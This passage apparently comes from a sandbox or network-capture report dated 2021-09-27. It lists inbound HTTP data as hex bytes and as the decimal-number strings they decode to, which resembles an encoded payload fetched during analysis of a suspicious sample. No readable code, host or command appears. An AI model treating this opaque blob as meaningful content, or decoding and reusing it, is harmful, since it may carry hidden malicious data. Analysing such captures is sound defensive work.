                                                                                              2021-09-27 18:27:44 UTC1734INData Raw: 31 20 31 31 36 20 31 30 39 20 31 31 38 20 35 32 20 32 36 20 35 30 20 35 34 20 38 34 20 31 30 35 20 36 39 20 31 30 34 20 31 31 32 20 31 39 30 20 34 38 20 35 30 20 35 34 20 32 30 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 37 33 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 35 20 39 35 20 36 39 20 31 31 33 20 35 31 20 34 38 20 35 36 20 35 32 20 31 32 31 20 31 31 33 20 39 39 20 37 30 20 31 31 33 20 33 37 20 34 36 20 33 31 20 34 34 20 31 31 34 20 31 32 20 32 34 34 20 31 30 39 20 31 31 32 20 35 34 20 34 37 20 34 37 20 33 36 20 38 34 20 31 30 34 20 39 33 20 31 36 37 20 31 31 32 20 35 30 20 35 34 20 34 32 20 32 37 20 39 34 20 38 34 20 31 31 34 20 31 32 33 20 39 34 20 33 20 32 37 20 35 32 20 36 30 20 31 32 37 20 31 35 30 20 31 32 36 20 37 30 20 31 33 32 20
                                                                                              Data Ascii: 1 116 109 118 52 26 50 54 84 105 69 104 112 190 48 50 54 20 114 117 124 14 73 48 50 50 121 115 95 69 113 51 48 56 52 121 113 99 70 113 37 46 31 44 114 12 244 109 112 54 47 47 36 84 104 93 167 112 50 54 42 27 94 84 114 123 94 3 27 52 60 127 150 126 70 132
                                                                                              2021-09-27 18:27:44 UTC1735INData Raw: 20 39 33 20 38 30 20 31 31 33 20 35 30 20 35 34 20 33 30 20 35 31 20 31 32 34 20 31 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 34 38 20 35 30 20 34 35 20 31 30 30 20 31 31 38 20 31 31 37 20 32 35 34 20 31 31 32 20 35 30 20 34 38 20 31 31 35 20 35 34 20 38 34 20 39 39 20 39 33 20 31 30 36 20 31 31 33 20 35 30 20 35 38 20 33 39 20 32 37 20 31 39 20 38 34 20 38 35 20 39 39 20 38 34 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 31 31 31 20 39 37 20 35 34 20 32 34 20 31 35 39 20 35 34 20 38 34 20 31 32 30 20 31 30 34 20 36 34 20 36 39 20 32 30 20 33 33 20 35 34 20 35 33 20 31 32 34 20 31 34 32 20 31 31 37 20 31 30 39 20 31 32 32 20 31 38 20 32 32 38 20 32 33 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31
                                                                                              Data Ascii: 93 80 113 50 54 30 51 124 11 117 109 118 24 48 50 45 100 118 117 254 112 50 48 115 54 84 99 93 106 113 50 58 39 27 19 84 85 99 84 226 46 26 201 84 114 115 111 97 54 24 159 54 84 120 104 64 69 20 33 54 53 124 142 117 109 122 18 228 23 230 74 90 138 109 11
                                                                                              2021-09-27 18:27:44 UTC1737INData Raw: 32 37 20 37 31 20 38 34 20 31 30 30 20 31 30 35 20 31 31 35 20 39 33 20 35 36 20 35 31 20 35 34 20 39 34 20 39 34 20 39 38 20 37 30 20 31 32 32 20 35 37 20 32 37 20 32 32 35 20 35 38 20 31 32 37 20 31 35 30 20 31 30 32 20 31 30 35 20 39 31 20 32 31 36 20 33 33 20 35 34 20 38 39 20 39 33 20 31 31 35 20 31 31 37 20 31 30 33 20 31 30 32 20 32 30 34 20 34 39 20 36 33 20 36 33 20 39 34 20 31 37 32 20 38 37 20 37 32 20 38 38 20 31 32 36 20 34 38 20 35 30 20 36 30 20 37 31 20 31 31 39 20 31 30 30 20 31 30 34 20 38 30 20 31 35 34 20 32 31 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 32 20 35 30 20 35 34 20 38 32 20 39 30 20 32 30 20 31 30 39 20 31 31 32 20 35 36 20 32 33 38 20 35 30 20 33 32 20 31 32 36 20 31
                                                                                              Data Ascii: 27 71 84 100 105 115 93 56 51 54 94 94 98 70 122 57 27 225 58 127 150 102 105 91 216 33 54 89 93 115 117 103 102 204 49 63 63 94 172 87 72 88 126 48 50 60 71 119 100 104 80 154 21 226 40 124 141 117 109 118 26 132 50 54 82 90 20 109 112 56 238 50 32 126 1
                                                                                              2021-09-27 18:27:44 UTC1738INData Raw: 20 38 34 20 31 31 38 20 39 38 20 32 20 31 35 37 20 35 30 20 34 38 20 35 36 20 34 34 20 31 32 31 20 39 37 20 38 33 20 31 30 37 20 31 34 20 37 37 20 34 38 20 35 30 20 35 30 20 34 32 20 36 37 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 33 35 20 35 31 20 35 34 20 39 34 20 31 37 32 20 38 32 20 31 30 33 20 39 31 20 32 31 37 20 32 31 20 32 36 20 31 32 32 20 38 34 20 31 31 34 20 31 32 37 20 31 31 37 20 39 33 20 34 32 20 32 32 20 35 33 20 32 32 20 34 36 20 38 37 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 38 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 38 31 20 35 30 20 35 34 20 39 34 20 31 37 32 20 31 31 38 20 31 30 32 20 39 31 20 32 31 32 20 32 36 20 35 30 20 35 35 20 36 38 20 31 31 34 20 31 31 37 20 31 30
                                                                                              Data Ascii: 84 118 98 2 157 50 48 56 44 121 97 83 107 14 77 48 50 50 42 67 117 109 116 93 35 51 54 94 172 82 103 91 217 21 26 122 84 114 127 117 93 42 22 53 22 46 87 165 115 88 205 48 50 48 124 198 117 109 118 26 81 50 54 94 172 118 102 91 212 26 50 55 68 114 117 10
                                                                                              2021-09-27 18:27:44 UTC1739INData Raw: 20 31 32 33 20 38 30 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 31 39 33 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 38 33 20 35 34 20 38 34 20 31 32 30 20 31 37 31 20 31 31 30 20 31 32 33 20 32 35 20 32 31 34 20 32 34 20 35 35 20 36 38 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 38 31 20 38 35 20 38 34 20 38 36 20 35 31 20 31 30 39 20 31 31 32 20 35 31 20 34 33 20 32 20 35 30 20 38 34 20 32 33 33 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 36 20 34 38 20 35 30 20 33 39 20 34 32 20 31 35 38 20 31 31 37 20 31 30 39 20 31 32 32 20 37 36 20 33 31 20 35 30 20 35 34 20 38 30 20 31 30 31 20 32 36 20 31 32 38 20 31 31 32 20 35 30 20 35 38 20 33 36 20 32 36 20 36 39 20 38 34 20 31 31 35 20 31 39
                                                                                              Data Ascii: 123 80 189 110 26 207 50 54 82 90 193 109 112 52 24 83 54 84 120 171 110 123 25 214 24 55 68 114 117 109 112 50 48 81 85 84 86 51 109 112 51 43 2 50 84 233 117 109 112 116 48 50 39 42 158 117 109 122 76 31 50 54 80 101 26 128 112 50 58 36 26 69 84 115 19
                                                                                              2021-09-27 18:27:44 UTC1741INData Raw: 38 34 20 31 31 36 20 39 35 20 37 35 20 39 31 20 32 32 33 20 34 38 20 35 30 20 35 34 20 38 37 20 36 36 20 31 32 37 20 31 30 39 20 31 30 30 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 30 32 20 34 30 20 32 39 20 36 32 20 31 36 20 35 39 20 31 30 31 20 31 31 36 20 31 30 39 20 31 32 32 20 32 36 20 31 36 39 20 35 30 20 35 34 20 38 32 20 38 38 20 38 33 20 37 30 20 31 33 30 20 35 37 20 30 20 35 34 20 35 34 20 34 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 36 36 20 31 30 31 20 38 38 20 31 32 37 20 38 36 20 31 38 20 31 39 35 20 32 30 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 31 33 34 20 35 34 20 38 34 20 31 31 36 20 31 37 31 20 39 38
                                                                                              Data Ascii: 84 116 95 75 91 223 48 50 54 87 66 127 109 100 50 48 50 54 84 114 117 110 102 40 29 62 16 59 101 116 109 122 26 169 50 54 82 88 83 70 130 57 0 54 54 49 114 117 109 112 50 48 50 52 66 101 88 127 86 18 195 20 230 74 90 138 109 112 52 24 134 54 84 116 171 98
                                                                                              2021-09-27 18:27:44 UTC1742INData Raw: 34 30 20 32 37 20 39 35 20 38 34 20 31 31 35 20 36 39 20 32 32 32 20 35 30 20 34 38 20 35 36 20 32 37 20 39 35 20 38 39 20 31 31 38 20 31 30 33 20 39 31 20 31 39 33 20 37 38 20 37 37 20 35 34 20 38 34 20 31 32 30 20 39 35 20 31 30 37 20 38 38 20 31 35 37 20 34 38 20 35 30 20 36 30 20 31 32 34 20 38 39 20 31 31 36 20 31 30 39 20 31 31 38 20 34 37 20 32 39 20 35 36 20 31 36 20 38 33 20 31 30 30 20 32 33 39 20 32 35 20 32 31 39 20 35 30 20 34 38 20 35 31 20 32 38 20 39 35 20 38 39 20 31 32 39 20 31 31 38 20 36 34 20 35 34 20 34 38 20 31 32 34 20 35 34 20 38 34 20 31 31 34 20 37 35 20 31 30 39 20 31 31 32 20 33 35 20 37 38 20 37 36 20 35 34 20 38 34 20 31 31 38 20 31 31 39 20 37 37 20 32 32 35 20 32 30 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20
                                                                                              Data Ascii: 40 27 95 84 115 69 222 50 48 56 27 95 89 118 103 91 193 78 77 54 84 120 95 107 88 157 48 50 60 124 89 116 109 118 47 29 56 16 83 100 239 25 219 50 48 51 28 95 89 129 118 64 54 48 124 54 84 114 75 109 112 35 78 76 54 84 118 119 77 225 20 224 44 30 171 114
                                                                                              2021-09-27 18:27:44 UTC1743INData Raw: 20 31 30 39 20 31 31 32 20 34 38 20 31 36 20 31 31 33 20 31 36 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 37 36 20 37 33 20 38 34 20 31 31 34 20 31 32 37 20 32 20 31 35 32 20 35 30 20 34 38 20 35 36 20 33 33 20 31 32 31 20 39 38 20 38 33 20 31 39 20 35 38 20 35 30 20 34 38 20 35 34 20 34 38 20 35 39 20 31 31 31 20 31 31 36 20 31 30 39 20 31 32 32 20 33 31 20 33 32 20 32 35 20 35 33 20 39 34 20 38 39 20 31 35 35 20 31 39 20 35 38 20 35 30 20 34 38 20 35 34 20 34 38 20 35 39 20 31 30 38 20 31 31 36 20 31 30 39 20 31 32 32 20 33 36 20 33 39 20 33 31 20 35 33 20 31 31 34 20 38 39 20 31 31 38 20 31 30 32 20 39 31 20 35 30 20 35 30 20 31 38 20 31 31 37 20 31 31 34 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38
                                                                                              Data Ascii: 109 112 48 16 113 16 132 108 93 146 112 50 54 76 73 84 114 127 2 152 50 48 56 33 121 98 83 19 58 50 48 54 48 59 111 116 109 122 31 32 25 53 94 89 155 19 58 50 48 54 48 59 108 116 109 122 36 39 31 53 114 89 118 102 91 50 50 18 117 114 162 107 69 143 50 48
                                                                                              2021-09-27 18:27:44 UTC1748INData Raw: 20 34 38 20 35 34 20 33 30 20 31 31 33 20 31 31 35 20 31 31 37 20 31 30 33 20 38 30 20 31 33 38 20 32 33 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 32 32 20 35 31 20 35 34 20 39 34 20 39 30 20 38 32 20 31 30 38 20 31 31 32 20 35 36 20 32 34 20 31 20 35 35 20 38 34 20 31 31 36 20 39 33 20 39 32 20 31 31 33 20 35 30 20 35 34 20 32 36 20 33 34 20 38 35 20 31 31 34 20 31 31 35 20 37 30 20 38 31 20 31 37 38 20 31 31 36 20 35 30 20 35 34 20 38 30 20 38 39 20 32 33 35 20 31 30 33 20 39 31 20 31 35 30 20 31 37 36 20 31 32 33 20 35 34 20 38 34 20 31 31 38 20 39 34 20 32 32 30 20 31 30 32 20 32 36 20 31 35 32 20 35 30 20 35 34 20 38 32 20 31 32 20 32 33 33 20 31 30 39 20 31 31 32 20 35 36 20 31 37 36 20 31 32 33 20
                                                                                              Data Ascii: 48 54 30 113 115 117 103 80 138 23 226 40 124 141 117 109 118 26 22 51 54 94 90 82 108 112 56 24 1 55 84 116 93 92 113 50 54 26 34 85 114 115 70 81 178 116 50 54 80 89 235 103 91 150 176 123 54 84 118 94 220 102 26 152 50 54 82 12 233 109 112 56 176 123
                                                                                              2021-09-27 18:27:44 UTC1752INData Raw: 20 33 30 20 38 35 20 39 38 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 33 36 20 35 30 20 33 30 20 31 30 34 20 31 31 34 20 36 32 20 34 33 20 31 31 32 20 35 30 20 34 39 20 34 39 20 36 20 39 34 20 31 31 34 20 36 38 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 33 20 31 30 38 20 31 32 30 20 39 33 20 32 30 20 32 32 20 31 38 20 32 34 30 20 31 32 34 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 35 32 20 37 33 20 31 30 34 20 38 38 20 31 31 36 20 38 36 20 39 33 20 31 38 35 20 35 31 20 35 34 20 38 32 20 39 20 31 32 31 20 31 30 39 20 31 31 32 20 35 34 20 32 34 20 31 31 30 20 35 34 20 38 34 20 31 32 30 20 39 33 20 32 31 37 20 31 31 32 20 35 30 20 35 34 20 32 34 20 31 36 20 31 32 37 20 31 37 30 20 38 33
                                                                                              Data Ascii: 30 85 98 117 109 112 50 36 50 30 104 114 62 43 112 50 49 49 6 94 114 68 109 112 50 48 50 54 84 113 108 120 93 20 22 18 240 124 162 107 69 143 50 48 52 52 73 104 88 116 86 93 185 51 54 82 9 121 109 112 54 24 110 54 84 120 93 217 112 50 54 24 16 127 170 83
                                                                                              2021-09-27 18:27:44 UTC1755INData Raw: 35 32 20 38 34 20 31 31 34 20 31 31 37 20 32 39 20 30 20 35 30 20 36 32 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 32 34 34 20 35 30 20 33 35 20 31 36 35 20 35 34 20 38 38 20 35 32 20 31 31 37 20 31 30 39 20 31 31 33 20 35 30 20 34 38 20 32 34 37 20 35 34 20 39 32 20 31 39 31 20 31 31 37 20 39 37 20 35 34 20 35 30 20 34 38 20 35 31 20 35 34 20 38 34 20 31 34 39 20 31 31 37 20 39 36 20 31 33 32 20 35 30 20 36 32 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 31 30 20 39 33 20 31 31 36 20 35 30 20 34 35 20 35 31 20 35 34 20 38 34 20 34 33 20 31 31 37 20 31 30 39 20 39 37 20 33 36 20 34 34 20 33 31 20 32 36 20 31 31 34 20 38 32 20 31 31 20 36 39 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 39 33 20 32 31
                                                                                              Data Ascii: 52 84 114 117 29 0 50 62 50 54 84 114 117 109 244 50 35 165 54 88 52 117 109 113 50 48 247 54 92 191 117 97 54 50 48 51 54 84 149 117 96 132 50 62 116 54 84 115 110 93 116 50 45 51 54 84 43 117 109 97 36 44 31 26 114 82 11 69 160 44 24 205 54 84 116 93 21
                                                                                              2021-09-27 18:27:44 UTC1760INData Raw: 35 35 20 35 30 20 35 34 20 38 35 20 31 30 36 20 38 38 20 36 39 20 38 36 20 34 38 20 34 30 20 31 36 38 20 37 39 20 32 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 20 31 32 37 20 34 38 20 35 30 20 35 35 20 37 34 20 39 35 20 31 31 31 20 37 35 20 31 31 34 20 34 33 20 31 37 30 20 37 30 20 31 35 37 20 38 34 20 31 31 34 20 31 31 36 20 31 30 33 20 31 32 31 20 35 33 20 35 36 20 35 32 20 33 30 20 31 33 38 20 31 31 34 20 31 31 37 20 31 30 37 20 39 30 20 36 33 20 32 37 20 32 35 35 20 36 31 20 31 32 37 20 31 36 34 20 31 32 31 20 37 30 20 31 34 38 20 35 30 20 34 38 20 33 33 20 36 20 38 32 20 31 31 34 20 34 36 20 31 30 39 20 31 31 32 20 35 30 20 38 30 20 35 30 20 35 34 20 36 39 20 31 31 32 20 39 39 20 32 34 37 20 39 20 31 32 32 20 34 38 20 35 30 20 35 35 20 33 37 20 35
                                                                                              Data Ascii: 55 50 54 85 106 88 69 86 48 40 168 79 25 114 117 108 1 127 48 50 55 74 95 111 75 114 43 170 70 157 84 114 116 103 121 53 56 52 30 138 114 117 107 90 63 27 255 61 127 164 121 70 148 50 48 33 6 82 114 46 109 112 50 80 50 54 69 112 99 247 9 122 48 50 55 37 5
                                                                                              2021-09-27 18:27:44 UTC1764INData Raw: 31 30 30 20 38 30 20 31 30 34 20 33 33 20 36 32 20 36 39 20 31 32 32 20 31 30 30 20 31 30 31 20 31 31 31 20 36 32 20 38 34 20 38 33 20 33 37 20 39 32 20 31 32 32 20 31 30 30 20 31 30 30 20 31 30 32 20 39 33 20 31 32 35 20 35 31 20 35 34 20 39 34 20 39 39 20 31 32 34 20 31 32 32 20 34 30 20 33 33 20 35 37 20 33 35 20 36 33 20 36 39 20 31 31 37 20 37 30 20 31 36 34 20 39 37 20 35 38 20 33 33 20 35 38 20 34 32 20 35 34 20 34 32 20 31 30 32 20 31 30 31 20 39 37 20 35 38 20 33 33 20 35 38 20 34 31 20 36 36 20 32 32 20 32 30 20 31 32 36 20 31 32 30 20 33 35 20 35 36 20 33 35 20 36 32 20 37 35 20 31 30 38 20 32 33 20 35 33 20 39 39 20 35 38 20 33 33 20 35 38 20 36 30 20 38 32 20 38 33 20 38 36 20 37 34 20 32 35 35 20 32 35 35 20 32 31 38 20 34 31 20 32 31 30 20
                                                                                              Data Ascii: 100 80 104 33 62 69 122 100 101 111 62 84 83 37 92 122 100 100 102 93 125 51 54 94 99 124 122 40 33 57 35 63 69 117 70 164 97 58 33 58 42 54 42 102 101 97 58 33 58 41 66 22 20 126 120 35 56 35 62 75 108 23 53 99 58 33 58 60 82 83 86 74 255 255 218 41 210
                                                                                              2021-09-27 18:27:44 UTC1768INData Raw: 36 20 39 34 20 31 31 34 20 31 30 36 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 32 20 31 30 37 20 31 32 30 20 39 33 20 33 38 20 32 32 20 32 36 20 31 31 39 20 38 34 20 31 31 34 20 31 32 37 20 31 31 31 20 31 30 37 20 34 36 20 32 39 20 36 32 20 31 36 20 36 36 20 32 34 20 39 33 20 31 34 38 20 31 31 32 20 35 30 20 35 34 20 32 34 20 31 36 20 31 32 37 20 31 35 32 20 38 33 20 37 30 20 31 33 30 20 35 30 20 33 35 20 32 20 34 39 20 38 34 20 37 33 20 31 31 36 20 31 30 39 20 31 31 32 20 38 38 20 34 38 20 35 30 20 33 39 20 31 32 34 20 37 37 20 31 31 36 20 31 30 39 20 31 32 32 20 32 32 36 20 31 37 20 35 30 20 35 34 20 38 36 20 39 30 20 35 31 20 31 30 39 20 31 31 32 20 35 36 20 39 35 20 31 31 34 20 35 35 20 38 34 20 31 32 30 20 39 31 20
                                                                                              Data Ascii: 6 94 114 106 109 112 50 48 50 54 84 112 107 120 93 38 22 26 119 84 114 127 111 107 46 29 62 16 66 24 93 148 112 50 54 24 16 127 152 83 70 130 50 35 2 49 84 73 116 109 112 88 48 50 39 124 77 116 109 122 226 17 50 54 86 90 51 109 112 56 95 114 55 84 120 91
                                                                                              2021-09-27 18:27:44 UTC1772INData Raw: 20 37 32 20 31 30 33 20 31 30 36 20 32 30 36 20 35 37 20 35 35 20 38 34 20 32 32 37 20 32 33 33 20 31 30 37 20 31 32 31 20 31 33 20 37 35 20 32 30 35 20 32 30 31 20 31 37 31 20 38 38 20 31 31 37 20 31 31 38 20 36 34 20 35 32 20 34 38 20 32 34 30 20 35 31 20 38 34 20 31 31 34 20 32 37 20 31 30 39 20 31 31 32 20 33 35 20 37 38 20 31 30 37 20 35 34 20 38 34 20 31 31 38 20 38 30 20 31 31 37 20 39 33 20 35 38 20 32 32 20 32 36 20 31 39 31 20 38 34 20 31 31 34 20 31 32 37 20 37 30 20 31 31 36 20 33 33 20 31 37 20 32 35 20 31 39 35 20 34 32 20 34 33 20 31 31 37 20 31 30 39 20 31 31 36 20 34 38 20 39 35 20 36 32 20 35 35 20 38 34 20 31 31 36 20 31 31 31 20 36 34 20 31 31 38 20 32 30 20 35 34 20 33 30 20 33 37 20 31 32 37 20 31 31 33 20 31 32 37 20 37 30 20 31 33
                                                                                              Data Ascii: 72 103 106 206 57 55 84 227 233 107 121 13 75 205 201 171 88 117 118 64 52 48 240 51 84 114 27 109 112 35 78 107 54 84 118 80 117 93 58 22 26 191 84 114 127 70 116 33 17 25 195 42 43 117 109 116 48 95 62 55 84 116 111 64 118 20 54 30 37 127 113 127 70 13
                                                                                              2021-09-27 18:27:44 UTC1776INData Raw: 39 38 20 32 35 32 20 31 31 31 20 34 32 20 38 32 20 38 32 20 33 37 20 37 33 20 39 39 20 31 30 34 20 32 32 34 20 38 32 20 35 30 20 34 38 20 35 31 20 33 37 20 37 32 20 39 39 20 31 30 39 20 31 31 39 20 39 37 20 34 36 20 32 34 20 32 30 34 20 35 34 20 38 34 20 31 31 36 20 31 30 30 20 31 32 30 20 39 32 20 35 20 33 33 20 34 31 20 32 32 20 34 36 20 32 35 30 20 31 30 39 20 31 30 39 20 36 37 20 32 38 20 33 33 20 34 37 20 31 38 37 20 31 31 39 20 31 31 34 20 31 31 37 20 31 30 38 20 39 39 20 34 34 20 33 38 20 33 33 20 34 31 20 31 32 37 20 39 38 20 31 30 30 20 31 31 35 20 39 37 20 34 35 20 33 33 20 34 36 20 33 39 20 37 35 20 32 32 37 20 32 33 32 20 31 32 34 20 31 31 31 20 33 37 20 31 30 34 20 33 33 20 34 31 20 36 39 20 31 30 39 20 31 30 30 20 31 31 32 20 36 36 20 32 31
                                                                                              Data Ascii: 98 252 111 42 82 82 37 73 99 104 224 82 50 48 51 37 72 99 109 119 97 46 24 204 54 84 116 100 120 92 5 33 41 22 46 250 109 109 67 28 33 47 187 119 114 117 108 99 44 38 33 41 127 98 100 115 97 45 33 46 39 75 227 232 124 111 37 104 33 41 69 109 100 112 66 21
                                                                                              2021-09-27 18:27:44 UTC1780INData Raw: 20 35 32 20 36 32 20 32 31 39 20 38 35 20 31 31 37 20 31 30 39 20 31 31 34 20 37 33 20 38 38 20 35 30 20 35 34 20 38 30 20 31 32 37 20 39 34 20 31 31 39 20 31 31 38 20 35 38 20 31 39 31 20 32 31 20 35 34 20 38 34 20 31 31 32 20 31 34 20 35 20 31 31 32 20 35 30 20 35 32 20 33 30 20 35 38 20 39 32 20 31 30 31 20 34 35 20 39 37 20 31 32 30 20 35 33 20 32 20 32 35 34 20 33 32 20 38 38 20 38 39 20 31 38 39 20 31 30 30 20 39 30 20 35 30 20 34 38 20 35 30 20 33 37 20 31 30 30 20 31 31 38 20 31 31 37 20 32 34 34 20 31 31 32 20 35 30 20 34 38 20 36 35 20 35 34 20 38 34 20 39 39 20 31 31 39 20 32 32 20 32 31 20 35 30 20 34 38 20 35 34 20 33 35 20 31 32 31 20 31 30 31 20 38 33 20 31 30 37 20 32 35 34 20 39 31 20 34 35 20 33 31 20 33 37 20 31 31 34 20 31 31 37 20 39
                                                                                              Data Ascii: 52 62 219 85 117 109 114 73 88 50 54 80 127 94 119 118 58 191 21 54 84 112 14 5 112 50 52 30 58 92 101 45 97 120 53 2 254 32 88 89 189 100 90 50 48 50 37 100 118 117 244 112 50 48 65 54 84 99 119 22 21 50 48 54 35 121 101 83 107 254 91 45 31 37 114 117 9
                                                                                              2021-09-27 18:27:44 UTC1784INData Raw: 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 32 30 37 20 31 31 38 20 34 33 20 31 36 20 34 33 20 33 31 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 31 34 34 20 34 38 20 37 38 20 38 32 20 31 30 38 20 36 38 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 32 31 35 20 31 30 37 20 31 30 37 20 31 38 20 35 35 20 32 37 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 31 34 36 20 35 32 20 34 32 20 31 31 30 20 32 33 20 31 31 36 20 31 30 39 20 31 31 32 20 32 30 20 34 37 20 33 37 20 31 38 37 20 32 35 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 33 20 38 20 38 31 20 35 31 20 35 34 20 38 34 20 38 34 20 31 31 35 20 31 32 33 20 38 30 20 32 20 32 35 20 32 32 36 20
                                                                                              Data Ascii: 46 26 201 84 114 115 207 118 43 16 43 31 132 108 93 146 112 50 54 144 48 78 82 108 68 160 44 24 205 54 84 116 215 107 107 18 55 27 230 74 90 138 109 112 52 146 52 42 110 23 116 109 112 20 47 37 187 255 114 117 108 103 8 81 51 54 84 84 115 123 80 2 25 226
                                                                                              2021-09-27 18:27:44 UTC1787INData Raw: 36 20 32 36 20 39 38 20 35 30 20 35 34 20 39 34 20 32 39 20 32 35 31 20 31 30 39 20 31 31 32 20 35 36 20 32 33 38 20 34 31 20 35 32 20 34 37 20 32 38 20 31 31 37 20 31 30 39 20 31 31 36 20 34 39 20 35 32 20 32 36 20 31 30 30 20 38 34 20 31 31 34 20 31 32 37 20 32 20 32 35 35 20 35 30 20 34 38 20 35 36 20 32 33 32 20 38 33 20 31 31 36 20 39 33 20 32 33 31 20 31 31 32 20 35 30 20 35 38 20 32 33 38 20 32 38 20 35 39 20 32 32 20 31 31 36 20 31 32 35 20 31 31 32 20 35 30 20 35 30 20 35 30 20 33 35 20 38 34 20 33 35 20 31 39 20 31 30 39 20 31 31 39 20 35 30 20 34 38 20 35 30 20 35 34 20 37 39 20 36 36 20 31 31 38 20 31 30 39 20 36 37 20 35 30 20 34 38 20 35 30 20 32 31 20 38 34 20 31 31 34 20 31 30 30 20 31 31 31 20 31 31 20 39 32 20 34 38 20 35 30 20 35 30 20
                                                                                              Data Ascii: 6 26 98 50 54 94 29 251 109 112 56 238 41 52 47 28 117 109 116 49 52 26 100 84 114 127 2 255 50 48 56 232 83 116 93 231 112 50 58 238 28 59 22 116 125 112 50 50 50 35 84 35 19 109 119 50 48 50 54 79 66 118 109 67 50 48 50 21 84 114 100 111 11 92 48 50 50
                                                                                              2021-09-27 18:27:44 UTC1792INData Raw: 39 20 31 31 39 20 36 39 20 39 33 20 35 31 20 34 38 20 35 32 20 34 36 20 31 32 31 20 31 32 33 20 38 33 20 31 32 37 20 31 31 33 20 37 33 20 31 38 31 20 35 30 20 35 34 20 38 30 20 38 38 20 31 32 36 20 37 30 20 31 33 33 20 35 30 20 34 38 20 35 30 20 34 35 20 31 30 30 20 31 31 36 20 31 31 37 20 36 30 20 31 31 37 20 35 30 20 34 38 20 37 39 20 35 34 20 38 34 20 39 39 20 31 31 20 32 35 20 31 31 32 20 35 30 20 35 32 20 34 30 20 32 37 20 39 34 20 38 34 20 31 30 30 20 31 30 33 20 38 38 20 31 38 37 20 34 38 20 35 30 20 36 30 20 31 32 37 20 31 31 38 20 31 30 32 20 31 30 33 20 39 31 20 31 39 33 20 37 38 20 36 35 20 35 34 20 38 34 20 31 31 38 20 31 31 39 20 32 20 32 20 35 31 20 34 38 20 35 36 20 37 32 20 33 39 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 35 20 39 33 20
                                                                                              Data Ascii: 9 119 69 93 51 48 52 46 121 123 83 127 113 73 181 50 54 80 88 126 70 133 50 48 50 45 100 116 117 60 117 50 48 79 54 84 99 11 25 112 50 52 40 27 94 84 100 103 88 187 48 50 60 127 118 102 103 91 193 78 65 54 84 118 119 2 2 51 48 56 72 39 114 117 105 115 93
                                                                                              2021-09-27 18:27:44 UTC1796INData Raw: 31 20 32 35 20 31 31 32 20 35 30 20 35 32 20 33 37 20 33 33 20 33 39 20 32 35 35 20 31 31 36 20 31 30 39 20 31 32 32 20 33 33 20 35 37 20 33 35 20 36 33 20 39 32 20 31 30 31 20 31 32 35 20 32 32 37 20 31 39 39 20 33 37 20 31 30 35 20 39 33 20 31 38 34 20 38 35 20 31 31 34 20 31 32 37 20 31 32 34 20 31 32 31 20 39 33 20 37 33 20 35 30 20 35 34 20 39 34 20 31 32 20 31 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 38 35 20 35 35 20 38 34 20 31 32 30 20 31 32 31 20 31 39 20 34 20 35 30 20 34 38 20 35 34 20 33 32 20 36 32 20 32 39 20 32 34 39 20 31 30 38 20 31 31 32 20 35 36 20 32 37 20 35 34 20 36 32 20 36 36 20 31 30 30 20 32 33 33 20 31 39 20 37 20 35 30 20 34 38 20 35 34 20 36 32 20 36 36 20 31 32 32 20 32 35 31 20 32 31 38 20 33 31 20 32 33 32 20 34 38
                                                                                              Data Ascii: 1 25 112 50 52 37 33 39 255 116 109 122 33 57 35 63 92 101 125 227 199 37 105 93 184 85 114 127 124 121 93 73 50 54 94 12 1 109 112 54 95 185 55 84 120 121 19 4 50 48 54 32 62 29 249 108 112 56 27 54 62 66 100 233 19 7 50 48 54 62 66 122 251 218 31 232 48
